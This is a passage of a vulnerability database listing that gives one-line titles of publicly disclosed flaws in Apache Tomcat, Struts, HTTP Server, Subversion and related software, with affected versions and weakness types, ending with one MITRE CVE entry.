| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
| [70809] Apache POI up to 3.11 Crash denial of service
| [70808] Apache POI up to 3.10 unknown vulnerability
| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
| [70749] Apache Axis up to 1.4 getCN spoofing
| [70701] Apache Traffic Server up to 3.3.5 denial of service
| [70700] Apache OFBiz up to 12.04.03 cross site scripting
| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
| [70661] Apache Subversion up to 1.6.17 denial of service
| [70660] Apache Subversion up to 1.6.17 spoofing
| [70659] Apache Subversion up to 1.6.17 spoofing
| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
| [69846] Apache HBase up to 0.94.8 information disclosure
| [69783] Apache CouchDB up to 1.2.0 memory corruption
| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
| [69431] Apache Archiva up to 1.3.6 cross site scripting
| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
2615| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
2616| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
2617| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
2618| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
2619| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
2620| [66739] Apache Camel up to 2.12.2 unknown vulnerability
2621| [66738] Apache Camel up to 2.12.2 unknown vulnerability
2622| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
2623| [66695] Apache CouchDB up to 1.2.0 cross site scripting
2624| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
2625| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
2626| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
2627| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
2628| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
2629| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
2630| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
2631| [66356] Apache Wicket up to 6.8.0 information disclosure
2632| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
2633| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
2634| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
2635| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
2636| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
2637| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
2638| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
2639| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
2640| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
2641| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
2642| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
2643| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
2644| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
2645| [65668] Apache Solr 4.0.0 Updater denial of service
2646| [65665] Apache Solr up to 4.3.0 denial of service
2647| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
2648| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
2649| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
2650| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
2651| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
2652| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
2653| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
2654| [65410] Apache Struts 2.3.15.3 cross site scripting
2655| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
2656| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
2657| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
2658| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
2659| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
2660| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
2661| [65340] Apache Shindig 2.5.0 information disclosure
2662| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
2663| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
2664| [10826] Apache Struts 2 File privilege escalation
2665| [65204] Apache Camel up to 2.10.1 unknown vulnerability
2666| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
2667| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
2668| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
2669| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
2670| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
2671| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
2672| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
2673| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
2674| [64722] Apache XML Security for C++ Heap-based memory corruption
2675| [64719] Apache XML Security for C++ Heap-based memory corruption
2676| [64718] Apache XML Security for C++ verify denial of service
2677| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
2678| [64716] Apache XML Security for C++ spoofing
2679| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
2680| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
2681| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
2682| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
2683| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
2684| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
2685| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
2686| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
2687| [64485] Apache Struts up to 2.2.3.0 privilege escalation
2688| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
2689| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
2690| [64467] Apache Geronimo 3.0 memory corruption
2691| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
2692| [64457] Apache Struts up to 2.2.3.0 cross site scripting
2693| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
2694| [9184] Apache Qpid up to 0.20 SSL misconfiguration
2695| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
2696| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
2697| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
2698| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
2699| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
2700| [8873] Apache Struts 2.3.14 privilege escalation
2701| [8872] Apache Struts 2.3.14 privilege escalation
2702| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
2703| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
2704| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
2705| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
2706| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
2707| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
2708| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
2709| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
2710| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
2711| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
2712| [64006] Apache ActiveMQ up to 5.7.0 denial of service
2713| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
2714| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
2715| [8427] Apache Tomcat Session Transaction weak authentication
2716| [63960] Apache Maven 3.0.4 Default Configuration spoofing
2717| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
2718| [63750] Apache qpid up to 0.20 checkAvailable denial of service
2719| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
2720| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
2721| [63747] Apache Rave up to 0.20 User Account information disclosure
2722| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
2723| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
2724| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
2725| [7687] Apache CXF up to 2.7.2 Token weak authentication
2726| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
2727| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
2728| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
2729| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
2730| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
2731| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
2732| [63090] Apache Tomcat up to 4.1.24 denial of service
2733| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
2734| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
2735| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
2736| [62833] Apache CXF -/2.6.0 spoofing
2737| [62832] Apache Axis2 up to 1.6.2 spoofing
2738| [62831] Apache Axis up to 1.4 Java Message Service spoofing
2739| [62830] Apache Commons-httpclient 3.0 Payments spoofing
2740| [62826] Apache Libcloud up to 0.11.0 spoofing
2741| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
2742| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
2743| [62661] Apache Axis2 unknown vulnerability
2744| [62658] Apache Axis2 unknown vulnerability
2745| [62467] Apache Qpid up to 0.17 denial of service
2746| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
2747| [6301] Apache HTTP Server mod_pagespeed cross site scripting
2748| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
2749| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
2750| [62035] Apache Struts up to 2.3.4 denial of service
2751| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
2752| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
2753| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
2754| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
2755| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
2756| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
2757| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
2758| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
2759| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
2760| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
2761| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
2762| [61229] Apache Sling up to 2.1.1 denial of service
2763| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
2764| [61094] Apache Roller up to 5.0 cross site scripting
2765| [61093] Apache Roller up to 5.0 cross site request forgery
2766| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
2767| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
2768| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
2769| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
2770| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
2771| [60708] Apache Qpid 0.12 unknown vulnerability
2772| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
2773| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
2774| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
2775| [4882] Apache Wicket up to 1.5.4 directory traversal
2776| [4881] Apache Wicket up to 1.4.19 cross site scripting
2777| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
2778| [60352] Apache Struts up to 2.2.3 memory corruption
2779| [60153] Apache Portable Runtime up to 1.4.3 denial of service
2780| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
2781| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
2782| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
2783| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
2784| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
2785| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
2786| [4571] Apache Struts up to 2.3.1.2 privilege escalation
2787| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
2788| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
2789| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
2790| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
2791| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
2792| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
2793| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
2794| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
2795| [59888] Apache Tomcat up to 6.0.6 denial of service
2796| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
2797| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
2798| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
2799| [59850] Apache Geronimo up to 2.2.1 denial of service
2800| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
2801| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
2802| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
2803| [58413] Apache Tomcat up to 6.0.10 spoofing
2804| [58381] Apache Wicket up to 1.4.17 cross site scripting
2805| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
2806| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
2807| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
2808| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
2809| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
2810| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
2811| [57568] Apache Archiva up to 1.3.4 cross site scripting
2812| [57567] Apache Archiva up to 1.3.4 cross site request forgery
2813| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
2814| [4355] Apache HTTP Server APR apr_fnmatch denial of service
2815| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
2816| [57425] Apache Struts up to 2.2.1.1 cross site scripting
2817| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
2818| [57025] Apache Tomcat up to 7.0.11 information disclosure
2819| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
2820| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
2821| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
2822| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
2823| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
2824| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
2825| [56512] Apache Continuum up to 1.4.0 cross site scripting
2826| [4285] Apache Tomcat 5.x JVM getLocale denial of service
2827| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
2828| [4283] Apache Tomcat 5.x ServletContect privilege escalation
2829| [56441] Apache Tomcat up to 7.0.6 denial of service
2830| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
2831| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
2832| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
2833| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
2834| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
2835| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
2836| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
2837| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
2838| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
2839| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
2840| [54693] Apache Traffic Server DNS Cache unknown vulnerability
2841| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
2842| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
2843| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
2844| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
2845| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
2846| [54012] Apache Tomcat up to 6.0.10 denial of service
2847| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
2848| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
2849| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
2850| [52894] Apache Tomcat up to 6.0.7 information disclosure
2851| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
2852| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
2853| [52786] Apache Open For Business Project up to 09.04 cross site scripting
2854| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
2855| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
2856| [52584] Apache CouchDB up to 0.10.1 information disclosure
2857| [51757] Apache HTTP Server 2.0.44 cross site scripting
2858| [51756] Apache HTTP Server 2.0.44 spoofing
2859| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
2860| [51690] Apache Tomcat up to 6.0 directory traversal
2861| [51689] Apache Tomcat up to 6.0 information disclosure
2862| [51688] Apache Tomcat up to 6.0 directory traversal
2863| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
2864| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
2865| [50626] Apache Solr 1.0.0 cross site scripting
2866| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
2867| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
2868| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
2869| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
2870| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
2871| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
2872| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
2873| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
2874| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
2875| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
2876| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
2877| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
2878| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
2879| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
2880| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
2881| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
2882| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
2883| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
2884| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
2885| [47214] Apachefriends xampp 1.6.8 spoofing
2886| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
2887| [47162] Apachefriends XAMPP 1.4.4 weak authentication
2888| [47065] Apache Tomcat 4.1.23 cross site scripting
2889| [46834] Apache Tomcat up to 5.5.20 cross site scripting
2890| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
2891| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
2892| [86625] Apache Struts directory traversal
2893| [44461] Apache Tomcat up to 5.5.0 information disclosure
2894| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
2895| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
2896| [43663] Apache Tomcat up to 6.0.16 directory traversal
2897| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
2898| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
2899| [43516] Apache Tomcat up to 4.1.20 directory traversal
2900| [43509] Apache Tomcat up to 6.0.13 cross site scripting
2901| [42637] Apache Tomcat up to 6.0.16 cross site scripting
2902| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
2903| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
2904| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
2905| [40924] Apache Tomcat up to 6.0.15 information disclosure
2906| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
2907| [40922] Apache Tomcat up to 6.0 information disclosure
2908| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
2909| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
2910| [40656] Apache Tomcat 5.5.20 information disclosure
2911| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
2912| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
2913| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
2914| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
2915| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
2916| [40234] Apache Tomcat up to 6.0.15 directory traversal
2917| [40221] Apache HTTP Server 2.2.6 information disclosure
2918| [40027] David Castro Apache Authcas 0.4 sql injection
2919| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
2920| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
2921| [3414] Apache Tomcat WebDAV Stored privilege escalation
2922| [39489] Apache Jakarta Slide up to 2.1 directory traversal
2923| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
2924| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
2925| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
2926| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
2927| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
2928| [38524] Apache Geronimo 2.0 unknown vulnerability
2929| [3256] Apache Tomcat up to 6.0.13 cross site scripting
2930| [38331] Apache Tomcat 4.1.24 information disclosure
2931| [38330] Apache Tomcat 4.1.24 information disclosure
2932| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
2933| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
2934| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
2935| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
2936| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
2937| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
2938| [37292] Apache Tomcat up to 5.5.1 cross site scripting
2939| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
2940| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
2941| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
2942| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
2943| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
2944| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
2945| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
2946| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
2947| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
2948| [36225] XAMPP Apache Distribution 1.6.0a sql injection
2949| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
2950| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
2951| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
2952| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
2953| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
2954| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
2955| [34252] Apache HTTP Server denial of service
2956| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
2957| [33877] Apache Opentaps 0.9.3 cross site scripting
2958| [33876] Apache Open For Business Project unknown vulnerability
2959| [33875] Apache Open For Business Project cross site scripting
2960| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
2961| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
2962|
2963| MITRE CVE - https://cve.mitre.org:
2964| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
